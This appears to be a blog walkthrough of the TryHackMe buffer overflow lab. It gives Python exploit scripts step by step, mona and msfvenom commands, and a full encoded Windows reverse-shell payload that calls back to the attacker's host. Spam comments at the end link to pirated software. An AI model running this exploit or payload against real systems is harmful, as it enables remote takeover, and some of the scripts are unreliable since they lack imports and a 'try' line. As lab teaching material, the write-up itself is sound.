Buffer Overflow Prep - OverFlow1- TryHackMe
Useful Links
===========
⇒ https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
⇒ https://tryhackme.com/room/bufferoverflowprep
Fuzzing with long input Strings
=========================
⇒ python3 -c 'print ("A" * 5000)' ⇒ Generate lots of As
⇒ Run oscp.exe in Immunity Debugger on the target
⇒ Connect with netcat and send these A's to target : OVERFLOW1 AAAA....5000 times
⇒ OSCP.exe crashes indicated we can exploit this using Buffer Overflow.
MSF Pattern create
================
⇒ msf-pattern_create -l 5000
⇒ send over to the target exe via nc session only.
Mona Config
===========
⇒ !mona config -set workingfolder c:\mona\%p ⇒ Run this in Immunity
Finding Offset
===========
⇒ In Immunity Debugger note the EIP after sending the pattern and crashing the exe.
⇒ msf-pattern_offset -l 5000 -q 6F43396E <====EIP
Offset is at 1978.⇒ Fuzz again with 1978 A's and 4 B's
• python3 -c 'print ("A" * 1978 + "B" * 4)'
• So we see EIP is filled with four B's. We found the exact sweet spot.
⇒ Python 3 script to test the same:
message = b"OVERFLOW1 " #Notice the space in the end
payload = message + b"A" * 1978 + b"B" * 4
try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + b'\r\n')
s.recv(1024)
s.close
except:
print("Cannot connect to server")
sys.exit()
Finding Bad Characters
===================
⇒ !mona bytearray -b "\x00" ⇒ Run this in Immunity to generate badchars byte array
⇒ https://github.com/mrinalpande/scripts/blob/master/python/badchars can also be used for bad chars
• Updated script
badchars = ( b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
payload = message + b"A" * 1978 + b"B" * 4 + badchars #Bad chars in the end
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + b'\r\n')
s.recv(1024)
s.close
except:
print("Cannot connect to server")
sys.exit()
• In Immunity Debugger Right Click ESP and "Follow in Dump" and any missing and blurred character that was send out in the above script
• So bad char in this example are \x00\x07\x2e\xa0 (\x00\x07\x08\x2e\x2f\xa0\xa1(Remember that badchars can affect the next byte as well))
• Also Mona can be used to find bad chars, run this in Immunity:
◇
!mona compare -f C:\mona\oscp\bytearray.bin -a 019DFA30 (<==ESP)
Finding Jump Point
===============
⇒ First find protection etc using Mona
• !mona modules
• Look for “False” across all the columns
• 2 in this case essfunc.dll and oscp.exe
• Target the dll first to find the find the Jump point
• !mona find -s "xff\xe4" -m essfunc #JMP ESP
• Go from top to bottom, pick the first one
• Take the Address from the first Jump
• 0x625011af ⇒ Write it in reverse order
• \xaf\x11\x50\x62
◇ !mona jmp -r esp -cpb "\x00\x07\x2e\xa0" (⇐ Bad chars)
▪ Take the address from the Output and put that also in reverse order as shown above.
• Update the script as:
import sys
message = b"OVERFLOW1 " #Notice the space in the end
ret = b"\xaf\x11\x50\x62" #This will replace the B's which were at EIP
payload = message + b"A" * 1978 + ret
try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + b'\r\n')
s.recv(1024)
s.close
except:
print("Cannot connect to server")
sys.exit()
• Set Breakpoint at 0x625011af after opening the exe in Immunity.
• Run the above exploit script
Generate Shell Code
================
⇒ msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=9999 EXITFUNC=thread -b "\x00" -f py
⇒ msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=9999 EXITFUNC=thread -b "\x00" -f c
• -p = payload
• LHOST = our local ip
• LPORT = our local port to get shell back
• -b = Bad characters to avoid
• -f = Output format e.g. C or Python
• msfvenom -p windows/shell_reverse_tcp LHOST=10.8.98.192 LPORT=9999 EXITFUNC=thread -b "\x00\x07\x2e\xa0 " -f c
• [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
"\xda\xc6\xb8\x92\xf3\x5c\x06\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x52\x83\xc3\x04\x31\x43\x13\x03\xd1\xe0\xbe\xf3\x29\xee\xbd"
"\xfc\xd1\xef\xa1\x75\x34\xde\xe1\xe2\x3d\x71\xd2\x61\x13\x7e"
"\x99\x24\x87\xf5\xef\xe0\xa8\xbe\x5a\xd7\x87\x3f\xf6\x2b\x86"
"\xc3\x05\x78\x68\xfd\xc5\x8d\x69\x3a\x3b\x7f\x3b\x93\x37\xd2"
"\xab\x90\x02\xef\x40\xea\x83\x77\xb5\xbb\xa2\x56\x68\xb7\xfc"
"\x78\x8b\x14\x75\x31\x93\x79\xb0\x8b\x28\x49\x4e\x0a\xf8\x83"
"\xaf\xa1\xc5\x2b\x42\xbb\x02\x8b\xbd\xce\x7a\xef\x40\xc9\xb9"
"\x8d\x9e\x5c\x59\x35\x54\xc6\x85\xc7\xb9\x91\x4e\xcb\x76\xd5"
"\x08\xc8\x89\x3a\x23\xf4\x02\xbd\xe3\x7c\x50\x9a\x27\x24\x02"
"\x83\x7e\x80\xe5\xbc\x60\x6b\x59\x19\xeb\x86\x8e\x10\xb6\xce"
"\x63\x19\x48\x0f\xec\x2a\x3b\x3d\xb3\x80\xd3\x0d\x3c\x0f\x24"
"\x71\x17\xf7\xba\x8c\x98\x08\x93\x4a\xcc\x58\x8b\x7b\x6d\x33"
"\x4b\x83\xb8\x94\x1b\x2b\x13\x55\xcb\x8b\xc3\x3d\x01\x04\x3b"
"\x5d\x2a\xce\x54\xf4\xd1\x99\x50\x01\xbb\x99\x0d\x13\x3b\x3d"
"\xc1\x9a\xdd\x2b\xcd\xca\x76\xc4\x74\x57\x0c\x75\x78\x4d\x69"
"\xb5\xf2\x62\x8e\x78\xf3\x0f\x9c\xed\xf3\x45\xfe\xb8\x0c\x70"
"\x96\x27\x9e\x1f\x66\x21\x83\xb7\x31\x66\x75\xce\xd7\x9a\x2c"
"\x78\xc5\x66\xa8\x43\x4d\xbd\x09\x4d\x4c\x30\x35\x69\x5e\x8c"
"\xb6\x35\x0a\x40\xe1\xe3\xe4\x26\x5b\x42\x5e\xf1\x30\x0c\x36"
"\x84\x7a\x8f\x40\x89\x56\x79\xac\x38\x0f\x3c\xd3\xf5\xc7\xc8"
"\xac\xeb\x77\x36\x67\xa8\x98\xd5\xad\xc5\x30\x40\x24\x64\x5d"
"\x73\x93\xab\x58\xf0\x11\x54\x9f\xe8\x50\x51\xdb\xae\x89\x2b"
"\x74\x5b\xad\x98\x75\x4e";
import sys
message = b"OVERFLOW1 " #Notice the space in the end
shell_code = (b"\xda\xc6\xb8\x92\xf3\x5c\x06\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
b"\x52\x83\xc3\x04\x31\x43\x13\x03\xd1\xe0\xbe\xf3\x29\xee\xbd"
b"\xfc\xd1\xef\xa1\x75\x34\xde\xe1\xe2\x3d\x71\xd2\x61\x13\x7e"
b"\x99\x24\x87\xf5\xef\xe0\xa8\xbe\x5a\xd7\x87\x3f\xf6\x2b\x86"
b"\xc3\x05\x78\x68\xfd\xc5\x8d\x69\x3a\x3b\x7f\x3b\x93\x37\xd2"
b"\xab\x90\x02\xef\x40\xea\x83\x77\xb5\xbb\xa2\x56\x68\xb7\xfc"
b"\x78\x8b\x14\x75\x31\x93\x79\xb0\x8b\x28\x49\x4e\x0a\xf8\x83"
b"\xaf\xa1\xc5\x2b\x42\xbb\x02\x8b\xbd\xce\x7a\xef\x40\xc9\xb9"
b"\x8d\x9e\x5c\x59\x35\x54\xc6\x85\xc7\xb9\x91\x4e\xcb\x76\xd5"
b"\x08\xc8\x89\x3a\x23\xf4\x02\xbd\xe3\x7c\x50\x9a\x27\x24\x02"
b"\x83\x7e\x80\xe5\xbc\x60\x6b\x59\x19\xeb\x86\x8e\x10\xb6\xce"
b"\x63\x19\x48\x0f\xec\x2a\x3b\x3d\xb3\x80\xd3\x0d\x3c\x0f\x24"
b"\x71\x17\xf7\xba\x8c\x98\x08\x93\x4a\xcc\x58\x8b\x7b\x6d\x33"
b"\x4b\x83\xb8\x94\x1b\x2b\x13\x55\xcb\x8b\xc3\x3d\x01\x04\x3b"
b"\x5d\x2a\xce\x54\xf4\xd1\x99\x50\x01\xbb\x99\x0d\x13\x3b\x3d"
b"\xc1\x9a\xdd\x2b\xcd\xca\x76\xc4\x74\x57\x0c\x75\x78\x4d\x69"
b"\xb5\xf2\x62\x8e\x78\xf3\x0f\x9c\xed\xf3\x45\xfe\xb8\x0c\x70"
b"\x96\x27\x9e\x1f\x66\x21\x83\xb7\x31\x66\x75\xce\xd7\x9a\x2c"
b"\x78\xc5\x66\xa8\x43\x4d\xbd\x09\x4d\x4c\x30\x35\x69\x5e\x8c"
b"\xb6\x35\x0a\x40\xe1\xe3\xe4\x26\x5b\x42\x5e\xf1\x30\x0c\x36"
b"\x84\x7a\x8f\x40\x89\x56\x79\xac\x38\x0f\x3c\xd3\xf5\xc7\xc8"
b"\xac\xeb\x77\x36\x67\xa8\x98\xd5\xad\xc5\x30\x40\x24\x64\x5d"
b"\x73\x93\xab\x58\xf0\x11\x54\x9f\xe8\x50\x51\xdb\xae\x89\x2b"
b"\x74\x5b\xad\x98\x75\x4e")
ret = b"\xaf\x11\x50\x62" #This will replace the B's which were at EIP
payload = message + b"A" * 1978 + ret + b"\x90" * 32 #Add NOPs \x90
try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + shell_code + b'\r\n')
s.recv(1024)
s.close
except:
print("Cannot connect to server")
sys.exit()
• Run the exploit after running the exe on target and we get the Reverse Shell :)
0inetMfi-a Amanda Rivers https://marketplace.visualstudio.com/items?itemName=2ciamenconyo.Descargar-Life-Winner-Cong-s-Double-Dragon-Dream-gratuita-2021
ReplyDeletejuncrogegen
MterpaFcen_pe Christi Patel FL Studio
ReplyDeleteKerish Doctor
Avast Premier
macalcemis